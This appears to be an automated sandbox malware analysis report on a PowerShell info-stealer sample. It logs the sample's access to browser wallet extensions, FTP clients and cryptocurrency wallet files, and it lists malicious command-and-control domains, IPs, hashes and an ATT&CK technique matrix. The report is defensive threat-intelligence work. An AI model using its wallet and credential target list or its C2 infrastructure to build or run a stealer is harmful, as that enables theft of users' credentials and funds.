          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7608, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
          Windows Management Instrumentation
          1
          DLL Side-Loading
          211
          Process Injection
          1
          Masquerading
          2
          OS Credential Dumping
          231
          Security Software Discovery
          Remote Services1
          Screen Capture
          21
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          PowerShell
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          231
          Virtualization/Sandbox Evasion
          LSASS Memory1
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
          Process Injection
          Security Account Manager231
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares41
          Data from Local System
          3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Deobfuscate/Decode Files or Information
          NTDS1
          Application Window Discovery
          Distributed Component Object Model3
          Clipboard Data
          114
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information
          LSA Secrets12
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials32
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          92.255.57_2.112.ps17%VirustotalBrowse
          92.255.57_2.112.ps111%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          kickykiduz.lat100%Avira URL Cloudmalware
          miniatureyu.lat100%Avira URL Cloudmalware
          bloodyswif.lat100%Avira URL Cloudmalware
          https://aleksandr-block.com/bu0%Avira URL Cloudsafe
          curtainykeo.lat100%Avira URL Cloudmalware
          washyceehsu.lat100%Avira URL Cloudmalware
          https://aleksandr-block.com/0%Avira URL Cloudsafe
          https://aleksandr-block.com/api0%Avira URL Cloudsafe
          savorraiykj.lat100%Avira URL Cloudmalware
          https://aleksandr-block.com/bm0%Avira URL Cloudsafe
          https://aleksandr-block.com:443/api0%Avira URL Cloudsafe
          https://aleksandr-block.com/$0%Avira URL Cloudsafe
          finickypwk.lat100%Avira URL Cloudmalware
          shoefeatthe.lat100%Avira URL Cloudmalware
          leggelatez.lat100%Avira URL Cloudmalware
          https://aleksandr-block.com:443/api.0%Avira URL Cloudsafe
          https://aleksandr-block.com/fe0%Avira URL Cloudsafe
          https://aleksandr-block.com/-0%Avira URL Cloudsafe
          https://aleksandr-block.com/pi0%Avira URL Cloudsafe
          https://aleksandr-block.com/F90%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          aleksandr-block.com
          188.114.96.3
          truetrue
            unknown
            steamcommunity.com
            104.102.49.254
            truefalse
              high
              finickypwk.lat
              unknown
              unknowntrue
                unknown
                washyceehsu.lat
                unknown
                unknowntrue
                  unknown
                  kickykiduz.lat
                  unknown
                  unknowntrue
                    unknown
                    bloodyswif.lat
                    unknown
                    unknowntrue
                      unknown
                      shoefeatthe.lat
                      unknown
                      unknowntrue
                        unknown
                        savorraiykj.lat
                        unknown
                        unknowntrue
                          unknown
                          miniatureyu.lat
                          unknown
                          unknowntrue
                            unknown
                            curtainykeo.lat
                            unknown
                            unknowntrue
                              unknown
                              leggelatez.lat
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://steamcommunity.com/profiles/76561199724331900false
                                  high
                                  kickykiduz.lattrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  bloodyswif.lattrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  savorraiykj.lattrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  miniatureyu.lattrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  curtainykeo.lattrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://aleksandr-block.com/apitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  washyceehsu.lattrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  finickypwk.lattrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  shoefeatthe.lattrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  leggelatez.lattrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1876839160.0000026ABFE2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1876839160.0000026AC01E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1876839160.0000026AC01E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://go.micropowershell.exe, 00000000.00000002.1876839160.0000026ABF967000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://aleksandr-block.com/RegSvcs.exe, 00000004.00000002.1874745531.000000000127B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://upx.sf.netAmcache.hve.0.drfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlppowershell.exe, 00000000.00000002.1876839160.0000026AC020F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1876839160.0000026AC01E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aleksandr-block.com/buRegSvcs.exe, 00000004.00000002.1874745531.000000000127B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aleksandr-block.com/bmRegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aleksandr-block.com:443/api.RegSvcs.exe, 00000004.00000002.1874544857.0000000001202000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aleksandr-block.com/-RegSvcs.exe, 00000004.00000002.1874715136.0000000001275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aleksandr-block.com:443/apiRegSvcs.exe, 00000004.00000002.1874544857.0000000001202000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://contoso.com/powershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1899228901.0000026ACE7F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1876839160.0000026AC035A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://aleksandr-block.com/$RegSvcs.exe, 00000004.00000002.1875258963.00000000036C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://oneget.orgXpowershell.exe, 00000000.00000002.1876839160.0000026ABFE2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aleksandr-block.com/feRegSvcs.exe, 00000004.00000002.1874616021.0000000001226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.1876839160.0000026ABE781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1876839160.0000026ABE781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aleksandr-block.com/piRegSvcs.exe, 00000004.00000002.1874745531.000000000127B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://oneget.orgpowershell.exe, 00000000.00000002.1876839160.0000026ABFE2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aleksandr-block.com/F9RegSvcs.exe, 00000004.00000002.1874745531.000000000127B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  188.114.96.3
                                                                  aleksandr-block.comEuropean Union
                                                                  13335CLOUDFLARENETUStrue
                                                                  104.102.49.254
                                                                  steamcommunity.comUnited States
                                                                  16625AKAMAI-ASUSfalse
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1590524
                                                                  Start date and time:2025-01-14 08:26:11 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 22s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:11
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:92.255.57_2.112.ps1
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winPS1@10/10@11/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 91%
                                                                  • Number of executed functions: 34
                                                                  • Number of non-executed functions: 48
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .ps1
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.42.65.92, 40.126.32.140, 20.109.210.53, 4.175.87.197, 13.107.246.45
                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  02:27:10API Interceptor43x Sleep call for process: powershell.exe modified
                                                                  02:27:11API Interceptor11x Sleep call for process: RegSvcs.exe modified
                                                                  02:27:24API Interceptor1x Sleep call for process: wermgr.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  188.114.96.3New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                                  • www.cifasnc.info/8rr3/
                                                                  CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                  • www.cifasnc.info/8rr3/
                                                                  1001-13.exeGet hashmaliciousFormBookBrowse
                                                                  • www.einpisalpace.shop/pgw3/
                                                                  trow.exeGet hashmaliciousUnknownBrowse
                                                                  • www.tc17.com/
                                                                  HN1GiQ5tF7.exeGet hashmaliciousFormBookBrowse
                                                                  • www.questmatch.pro/ipd6/
                                                                  AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                  • www.zkdamdjj.shop/kf1m/
                                                                  XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                                  • www.einpisalpace.shop/8g74/?wtE0B=1LjxZz&9F=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO
                                                                  tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                  • www.zkdamdjj.shop/kf1m/
                                                                  M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                  • www.zkdamdjj.shop/kf1m/
                                                                  https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                  • cocteldedeas.mx/rx567/
                                                                  104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                  http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                  • www.valvesoftware.com/legal.htm
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  steamcommunity.comuo9m.exeGet hashmaliciousLummaCBrowse
                                                                  • 23.197.127.21
                                                                  uo9m.exeGet hashmaliciousLummaCBrowse
                                                                  • 23.50.98.133
                                                                  L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.102.49.254
                                                                  NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.102.49.254
                                                                  g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.102.49.254
                                                                  lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.102.49.254
                                                                  UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                  • 104.102.49.254
                                                                  TBI87y49f9.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.102.49.254
                                                                  H5JVfa61AV.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.102.49.254
                                                                  2EG0jAmtY6.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.102.49.254
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUSphishing.emlGet hashmaliciousPhisherBrowse
                                                                  • 188.114.96.3
                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.16.1
                                                                  https://tinyurl.com/286oc4lyGet hashmaliciousUnknownBrowse
                                                                  • 104.17.112.233
                                                                  http://hotpepperliberia.comGet hashmaliciousUnknownBrowse
                                                                  • 172.67.130.110
                                                                  https://email.lc.haxconsulting.com/c/eJx0k0tv4zgQhH-NdBk4kKgHrQMPdhI5mck78djJRaDIlsSYD4WkpLF__cJOsLvAZq_FLnbhQzWrBCdJS6-fh9_RaK9H9Muk6c9yE3LCCkjrLORGUaGJZGcd_cOMdoP0QrdnzKivt8pMGqzrRF_5fQ-EtqDZvqLOiVYDD4HEOMnxvMB5EoKiQlYKnKMtHLdv5i83BT5n4-tb-75JAbPHy6-p02-Mqp6KVv9LO9pyPE9ZwVKaZjlkgBjkRVEjHIIehTVagfakt4YPzAujw45EeRrF0RziBvIoyeskRxgwwlma0ajAPBQERSiL4jg55o2Ss2YOOYWszps4a5o6CtLoWwySdN73LkgWASoDVE7T9N-pAJXcTFoaymeOSmr3s3YQHGYDhSApG2GdrzRVECQXdyBkgHJJ_5GuqNsJ7QKUnzgEyYUGIbsvNY0644_656a874w-uqIs-lGk6Q-UFjiUrPpkKLQHq6kka1Q6vvq928YBWm7z65vVxHE3FgEq59i-jvvVs0xEw7L6_MK2IhvbP_TKJn77qF7k3TSixbC_V5cBWuI33j_fivpGtZOAqN0Zxga7eJCXr-uXzfMHlIcjgANevhv8USfN_ZM-L_Dhoeu38GTXt4sALYfFzheHl3LNy1VZjw8iQOU6QOWmvb3vrqbc9Y17WtynH9OVVkrF8qdedwDgHtt4eTkPpTn1ebm6Sd7eV-rWxvS93979kt02VOA7wwntRWisaIUm9SB3sxOQsLdmFBwskUA5M1oD88aGlvwv49CZwTIgJ_9MuHE2GbsDG3pyTPFtBE-YUdW31-YJ-Orvpo8E_RUAAP__dHE7QwGet hashmaliciousUnknownBrowse
                                                                  • 104.17.113.39
                                                                  http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                  • 172.67.74.152
                                                                  https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?Get hashmaliciousHTMLPhisherBrowse
                                                                  • 1.1.1.1
                                                                  http://mshare-54543.pages.dev/index-2tuka/Get hashmaliciousUnknownBrowse
                                                                  • 172.66.47.106
                                                                  https://iyztciuamr.cfolks.pl/ppGet hashmaliciousUnknownBrowse
                                                                  • 104.22.49.253
                                                                  http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturrGet hashmaliciousUnknownBrowse
                                                                  • 104.26.6.173
                                                                  AKAMAI-ASUShttps://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?Get hashmaliciousHTMLPhisherBrowse
                                                                  • 2.19.126.80
                                                                  https://staemcomnunlty.com/glft/91832Get hashmaliciousUnknownBrowse
                                                                  • 2.19.126.91
                                                                  https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?Get hashmaliciousHTMLPhisherBrowse
                                                                  • 2.19.126.83
                                                                  uo9m.exeGet hashmaliciousLummaCBrowse
                                                                  • 23.50.98.133
                                                                  https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcTGet hashmaliciousHTMLPhisherBrowse
                                                                  • 2.19.126.84
                                                                  Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                                  • 23.40.179.46
                                                                  phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                  • 2.19.126.75
                                                                  Cardfactory Executed Agreement DocsID- Sign & Review..emlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 23.56.162.204
                                                                  https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20linkGet hashmaliciousUnknownBrowse
                                                                  • 23.212.88.20
                                                                  elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 104.114.132.152
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  a0e9f5d64349fb13191bc781f81f42e18e8JUOzOjR.exeGet hashmaliciousDBatLoaderBrowse
                                                                  • 104.102.49.254
                                                                  • 188.114.96.3
                                                                  UTstKgkJNY.exeGet hashmaliciousDBatLoaderBrowse
                                                                  • 104.102.49.254
                                                                  • 188.114.96.3
                                                                  On9ahUpI4R.exeGet hashmaliciousDBatLoaderBrowse
                                                                  • 104.102.49.254
                                                                  • 188.114.96.3
                                                                  JDQS879kiy.exeGet hashmaliciousDBatLoaderBrowse
                                                                  • 104.102.49.254
                                                                  • 188.114.96.3
                                                                  UAHIzSm2x2.exeGet hashmaliciousDBatLoaderBrowse
                                                                  • 104.102.49.254
                                                                  • 188.114.96.3
                                                                  LbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
                                                                  • 104.102.49.254
                                                                  • 188.114.96.3
                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.102.49.254
                                                                  • 188.114.96.3
                                                                  183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.102.49.254
                                                                  • 188.114.96.3
                                                                  uo9m.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.102.49.254
                                                                  • 188.114.96.3
                                                                  No context
                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.5322122137743448
                                                                  Encrypted:false
                                                                  SSDEEP:96:FmhFr3FwjfrxYid6zRH3Uje0e35/3oo16l51QXIGZAX/d5FMT2SlPkpXmTA/f/V3:Ax3EfmG6zR30md8cAzuiF3Z24lO8
                                                                  MD5:32991AA0DA6D45CD9754C7F8D70F683A
                                                                  SHA1:CCA785411DB556A2CB72A443D8A529465CE4653B
                                                                  SHA-256:B177EF80A3569CA4B52DDAD88A57785F280937FECB2C79D589F7121CDFAC81F5
